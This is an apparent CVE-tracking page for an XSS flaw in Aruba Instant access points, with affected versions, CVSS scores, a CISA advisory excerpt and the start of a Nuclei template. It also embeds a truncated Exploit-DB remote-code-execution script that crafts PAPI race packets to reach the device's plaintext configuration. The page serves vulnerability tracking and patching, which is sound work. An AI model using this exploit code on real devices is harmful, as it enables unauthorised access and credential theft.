CVE-2021-25161
published 2021-03-30CVE-2021-25161: A remote cross-site scripting (xss) vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x…
PriorityP348medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
16.37%
96.6th percentile
A remote cross-site scripting (xss) vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x: 6.5.4.18 and below; Aruba Instant 8.3.x: 8.3.0.14 and below; Aruba Instant 8.5.x: 8.5.0.11 and below; Aruba Instant 8.6.x: 8.6.0.7 and below; Aruba Instant 8.7.x: 8.7.1.1 and below. Aruba has released patches for Aruba Instant that address this security vulnerability.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arubanetworks | instant | 6.4.0.0 – 6.4.4.8-4.2.4.18 | — |
| arubanetworks | instant | >= 6.5.0.0 < 6.5.4.19 | 6.5.4.19 |
| arubanetworks | instant | >= 8.3.0.0 < 8.3.0.15 | 8.3.0.15 |
| arubanetworks | instant | >= 8.5.0.0 < 8.5.0.12 | 8.5.0.12 |
| arubanetworks | instant | >= 8.6.0.0 < 8.6.0.8 | 8.6.0.8 |
| arubanetworks | instant | >= 8.7.0.0 < 8.7.1.2 | 8.7.1.2 |
| siemens | scalance_w1750d_firmware | >= 8.7.0 < 8.7.1.3 | 8.7.1.3 |
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-g3xx-qmpj-v42m: A remote cross-site scripting (xss) vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6
ghsa_unreviewed·2022-05-24
CVE-2021-25161 [MEDIUM] CWE-79 GHSA-g3xx-qmpj-v42m: A remote cross-site scripting (xss) vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6
A remote cross-site scripting (xss) vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x: 6.5.4.18 and below; Aruba Instant 8.3.x: 8.3.0.14 and below; Aruba Instant 8.5.x: 8.5.0.11 and below; Aruba Instant 8.6.x: 8.6.0.7 and below; Aruba Instant 8.7.x: 8.7.1.1 and below. Aruba has released patches for Aruba Instant that address this security vulnerability.
CISA ICS
Siemens SCALANCE W1750D (Update B)
cisa_ics·2021-08-10·CVSS 7.2
[HIGH] Siemens SCALANCE W1750D (Update B)
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Siemens SCALANCE W1750D (Update B)
Last RevisedOctober 14, 2021
Alert CodeICSA-21-131-14
## 1. EXECUTIVE SUMMARY
- CVSS v3 9.8
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: Siemens
- Equipment: SCALANCE W1750D
- Vulnerabilities: Improper Authentication, Classic Buffer Overflow, Command Injection, Improper Input Validation, Race Condition, Cross-site Scripting, Basic XSS, Uncontrolled Resource Consumption
## 2. UPDATE INFORMATION
This updated advisory is a follow-up to the original advisory titled ICSA-21-131-14 Siemens SCALANCE W1750D (Update A) that wa
No detection rules found.
Exploit-DB
Aruba Instant (IAP) - Remote Code Execution
exploitdb·2021-07-15
CVE-2021-25162 Aruba Instant (IAP) - Remote Code Execution
Aruba Instant (IAP) - Remote Code Execution
---
import socket
import sys
import struct
import time
import threading
import urllib3
import re
import telnetlib
import xml.etree.ElementTree as ET
import requests
urllib3.disable_warnings()
CONTINUE_RACE = True
SNPRINTF_CREATEFILE_MAX_LENGTH = 245
def race_papi_message(ip):
global CONTINUE_RACE
payload = b"\x49\x72"
payload += b"\x00\x03"
payload += b"\x7F\x00\x00\x01"
payload += b"\x7F\x00\x00\x01"
payload += b"\x00\x00"
payload += b"\x00\x00"
payload += b"\x3B\x7E"
payload += b"\x41\x41"
payload += b"\x04\x22"
payload += b"\x00\x00"
payload += b"\x02\x00"
payload += b"\x00\x00"
payload += b"\x00" * 12 * 4
text_to_send = bytes()
for i in "msg_ref 3000 /tmp/cfg-plaintext\x00":
text_to_send += struct.pack("B", int(ord(i)) ^ 0x93)
packet
Nuclei
Aruba Instant Access Point (IAP) - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2021-25161 [MEDIUM] Aruba Instant Access Point (IAP) - Cross-Site Scripting
Aruba Instant Access Point (IAP) - Cross-Site Scripting
A remote cross-site scripting (xss) vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x: 6.5.4.18 and below; Aruba Instant 8.3.x: 8.3.0.14 and below; Aruba Instant 8.5.x: 8.5.0.11 and below; Aruba Instant 8.6.x: 8.6.0.7 and below; Aruba Instant 8.7.x: 8.7.1.1 and below.
Template:
id: CVE-2021-25161
info:
name: Aruba Instant Access Point (IAP) - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
A remote cross-site scripting (xss) vulnerability was discovered in some Aruba Instant Access Point (IAP) products in version(s): Aruba Instant 6.4.x: 6.4.4.8-4.2.4.17 and below; Aruba Instant 6.5.x: 6.5.4.18
No writeups or analysis indexed.
http://packetstormsecurity.com/files/163522/Aruba-Instant-IAP-Remote-Code-Execution.htmlhttps://cert-portal.siemens.com/productcert/pdf/ssa-723417.pdfhttps://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-007.txthttp://packetstormsecurity.com/files/163522/Aruba-Instant-IAP-Remote-Code-Execution.htmlhttps://cert-portal.siemens.com/productcert/pdf/ssa-723417.pdfhttps://www.arubanetworks.com/assets/alert/ARUBA-PSA-2021-007.txt
2021-03-30
Published